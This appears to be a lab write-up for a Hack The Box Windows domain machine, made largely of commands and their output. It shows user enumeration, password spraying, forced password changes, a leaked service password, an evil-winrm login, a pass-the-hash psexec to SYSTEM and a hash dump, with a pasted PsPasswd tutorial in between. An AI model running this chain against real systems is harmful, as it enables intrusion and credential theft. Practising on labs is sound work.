1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/17%Time=5EE9E8E5%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m05s, deviation: 4h02m32s, median: 17m03s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-17T03:16:16-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-17 06:16:14
|_  start_date: 2020-06-17 00:32:55

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   85.26 ms 10.10.14.1
2   85.44 ms fuse.fabricorp.local (10.10.10.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.81 seconds
root@kali:~/htb/fuse#
```
=> users: pmerton, tlavel, bnielson
check for more users
```
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlist.txt

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:06:02 >  Using KDC(s):
2020/06/17 12:06:02 >   fabricorp.local:88

2020/06/17 12:06:21 >  [+] VALID USERNAME:       administrator@fabricorp
2020/06/17 12:08:31 >  [+] VALID USERNAME:       Administrator@fabricorp
2020/06/17 12:16:07 >  [+] VALID USERNAME:       sthompson@fabricorp
2020/06/17 12:22:27 >  [+] VALID USERNAME:       fuse@fabricorp
2020/06/17 12:22:27 >  [+] VALID USERNAME:       bhult@fabricorp
2020/06/17 12:22:43 >  Done! Tested 100000 usernames (5 valid) in 1001.177 seconds
```
combined
```
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlistsmall.txt

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:27:46 >  Using KDC(s):
2020/06/17 12:27:46 >   fabricorp.local:88

2020/06/17 12:27:46 >  [+] VALID USERNAME:       fuse@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       Administrator@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       tlavel@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       sthompson@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       pmerton@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       bnielson@fabricorp
2020/06/17 12:27:46 >  [+] VALID USERNAME:       bhult@fabricorp
2020/06/17 12:27:46 >  Done! Tested 9 usernames (7 valid) in 0.153 seconds
```
check if any of these 7 have UF_DONT_REQUIRE_PREAUTH set
```
root@kali:~/htb/fuse# GetNPUsers.py -dc-ip 10.10.10.193 -no-pass FABRICORP.LOCAL/bnielson
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for bnielson
[-] User bnielson doesn't have UF_DONT_REQUIRE_PREAUTH set
```
```
E:\PENTEST>crackmapexec.exe 10.10.10.193 -u usernames.txt -p Fabricorp01
06-17-2020 14:20:32 [*] 10.10.10.193:445 is running Windows 10.0 Build 14393 (name:FUSE) (domain:FABRICORP)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\fuse:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\Administrator:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\tlavel:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\sthompson:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\pmerton:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bnielson:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bhult:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
```
tried but failed
Remote Windows Systems Using Sysinternals PsPasswd
We all know that a good administrator will find a way to automate or make boring tasks easy. Changing passwords on Windows systems, usually Administrator accounts, is one of those we least like to do but have to, for audit purposes and also when other administrators leave.
Well, here is another tool that can help with changing passwords. The free utility PsPasswd is part of Microsoft's Sysinternals PsTools; it lets you change an account password on the local or remote systems, which enables admins to create batch files that run PsPasswd against the computers they manage to perform a mass change of the administrator password.
And for security, PsPasswd does not send passwords over the network in the clear. You can use PsPasswd to change the password of a local or domain account on the local or a remote computer.
So how does it work?
usage: pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]
computer – Perform the command on the remote computer or computers specified. If you omit the computer name the command runs on the local system, and if you specify a wildcard (\\*), the command runs on all computers in the current domain.
@file – Run the command on each computer listed in the text file specified.
-u – Specifies optional user name for login to remote computer.
-p – Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.
Username – Specifies name of account for password change.
NewPassword – New password. If ommitted a NULL password is applied.
So say we wanted to change the password on a server.
1
|
pspasswd \\win2008tst –u myadmin –p myadmpasswd Administrator newpasswd
|
That’s all. Now say we don’t want to pass the password on the command line, then omit the -p and a popup will prompt you for the password.
```
E:\PENTEST>pspasswd \\10.10.10.193 -u tlavel -p Fabricorp01 tlavel F!bricorp02!

PsPasswd v1.24 - Local and remote password changer
Copyright (C) 2003-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Error changing password:
Access is denied.

E:\PENTEST>
```
Tried smbpasswd:
```
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:1234567
Retype new SMB password:
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password: Fabricorp01
Password changed for user bnielson on 10.10.10.193.
```
```
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password:Fabricorp02
Password changed for user bnielson on 10.10.10.193.
root@kali:~/htb# smbclient //10.10.10.193/print$ -U bnielson
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\bnielson's password: Fabricorp02
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri May 29 20:12:41 2020
  ..                                  D        0  Fri May 29 20:12:41 2020
  color                               D        0  Sat Jul 16 09:18:08 2016
  IA64                                D        0  Fri May 29 20:12:41 2020
  W32X86                              D        0  Mon Jun  1 05:03:44 2020
  x64                                 D        0  Mon Jun  1 05:03:46 2020

                10340607 blocks of size 4096. 7554925 blocks available
smb: \>
```
```
root@kali:~/htb# rpcclient -U "bnielson" 10.10.10.193
Enter WORKGROUP\bnielson's password:Fabricorp02
rpcclient $> ls
command not found: ls
rpcclient $> help
---------------         ----------------------
          CLUSAPI
clusapi_open_cluster            bla
clusapi_get_cluster_name        bla
-snip-
rpcclient $>
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $>
```
```
rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]
```
```
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.10.193 -u svc-print
Enter Password: $fab@s3Rv1ce$1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> cd desktop
*Evil-WinRM* PS C:\Users\svc-print\desktop> dir

    Directory: C:\Users\svc-print\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/17/2020  11:49 PM             34 user.txt

*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
867719f8b9ef372cd05d1e30997c7d28
*Evil-WinRM* PS C:\Users\svc-print\desktop>
```
```
root@kali:~/htb/fuse# psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e Administrator@10.10.10.193
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file VwvVtgEd.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service fhoH on 10.10.10.193.....
[*] Starting service fhoH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:\users\desktop
The system cannot find the path specified.

C:\Windows\system32>cd c:\users

c:\Users>cd Administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is E6C8-44FE

 Directory of c:\Users\Administrator\Desktop

06/01/2020  02:03 AM    <DIR>          .
06/01/2020  02:03 AM    <DIR>          ..
06/17/2020  11:49 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  30,865,776,640 bytes free

c:\Users\Administrator\Desktop>type root.txt
2b81c0276298df3453ae7da86e9babf4

c:\Users\Administrator\Desktop>
```
```
c:\tja>pwdump8

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:521A94AF0CFA785A1EEC638D803E482C
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
DefaultAccount:503:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
```